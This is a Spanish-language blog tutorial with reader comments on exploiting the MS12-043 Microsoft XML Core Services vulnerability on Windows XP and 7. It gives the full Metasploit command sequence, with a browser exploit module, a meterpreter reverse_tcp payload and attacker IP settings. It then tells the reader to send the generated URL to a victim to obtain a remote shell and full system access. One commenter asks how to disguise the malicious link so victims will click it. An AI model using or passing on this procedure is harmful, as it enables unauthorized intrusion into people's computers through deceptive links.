En este entrada se describirá como explotar un Sistema Windows, ya sea XP o 7, mediante la vulnerabilidad MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption desde el Metasploit de una forma rápida y divertida como acostumbramos a hacerlo.
Esta vulnerabilidad se aprovecha de un fallo en la memoria de Microsoft XML Core Services al intentar acceder a un nodo sin inicializar con la API getDefinition, por lo que puede dañar la memoria, permitiendo la ejecución remota de código.
Plataformas de Windows afectados:
- Microsoft Windows XP
- Microsoft Windows Vista
- Microsoft Windows Server 2008 R2
- Microsoft Windows Server 2008
- Microsoft Windows Server 2003
- Microsoft Windows 7
- Microsoft Windows 2000
Productos de Windows afectados:
- Microsoft XML Core Services 6.0
- Microsoft XML Core Services 5.0
- Microsoft XML Core Services 4.0
- Microsoft XML Core Services 3.0
- Microsoft Expression Web
- Microsoft SharePoint Server 2007
- Microsoft Office Groove 2007
- Microsoft Word Viewer
- Microsoft Office Compatibility Pack
- Microsoft Office 2007
- Microsoft Office 2003
Para proceder a explotar esta vulnerabilidad, debemos usar y realizar lo siguiente:
REQUERIMIENTOS:
- Backtrack 5 R1 - R2 o R3 (Atacante)
- Metasploit Framework (Atacante)
- Windows XP - 7 (Victima)
PROCEDIMIENTO DEL ATAQUE:
Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:
-------------------------------------------------------------------------------------------------------------
use exploit/windows/browser/msxml_get_definition_code_exec (Usar msxml code exploit)
set payload windows/meterpreter/reverse_tcp (Payload que devolvera un Meterpreter)
set lhost 192.168.1.17 (IP del Atacante)
set srvhost 192.168.1.17 (IP del Atacante)
set uripath / (Path del link a enviar)
exploit
-------------------------------------------------------------------------------------------------------------
Dichos comandos crearan una URL, por ejemplo http://192.167.1.17:8080 la cual tenemos que enviarle al usuario (victima) para que lo ejecute desde su navegador y así recibir la conexión inversa.
Ejemplo:
Dicha imagen muestra que ya he recibido una conexión entre mi ordenador y el usuario (victima), por lo tanto tenemos acceso total al sistema, solo quedaría generar la session para poder ejecutar comandos dentro del sistema 'owneado'
Ejemplo:
Espero lo usen con fines de aprendizaje ;)
Saludos.
Excelente amigo... solo que con una cuestion, miro que lo detecta el antivirus...
ResponderEliminarCaleb muy bueno!! Esta web tiene futuro :D
ResponderEliminar¿Existe alguna forma de protegernos de estos ataques? Buen aporte.
ResponderEliminarSaludos
Can we Make a Team ?
ResponderEliminarCan we make Team
ResponderEliminarOigan por que me sale este mensage
ResponderEliminarUnknown variable
Usage: set [option] [value]
Set the given option to value. If value is omitted, print the current value.
If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module's
datastore. Use -g to operate on the global datastore
Hola una consulta este ataque es para tu red local o global ???
ResponderEliminarHola una consulta este ataque es para tu red local o global ???
ResponderEliminarSi.. Claro.. Fines de apredizaje ¬¬ xDDD
ResponderEliminarhola tus post son de lujos pero te falto una cosa que usario con 2 dedos de frente va apretar esa url que es una direccion ip te falto decir como poder ocultar esa direccion para poder concretar el ataque seria de mucha ayuda desde ya muchas gracias :)
ResponderEliminar